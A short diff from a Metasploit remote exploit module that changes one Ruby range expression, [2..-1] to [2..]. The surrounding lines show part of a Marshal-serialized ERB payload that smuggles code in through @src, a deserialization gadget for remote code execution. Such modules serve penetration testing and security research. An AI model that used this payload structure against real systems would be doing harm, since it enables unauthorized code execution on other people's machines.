@@ -430,7 +430,7 @@ class MetasploitModule < Msf::Exploit::Remote
         "\t:\x0E@instance" \
           "o:\bERB" \
             "\b" \
-              ":\t@src#{Marshal.dump(code)[2..-1]}" \
+              ":\t@src#{Marshal.dump(code)[2..]}" \
               ":\x0E@filename\"\x061" \
               ":\f@linenoi\x06" \
           ":\f@method:\vresult" \
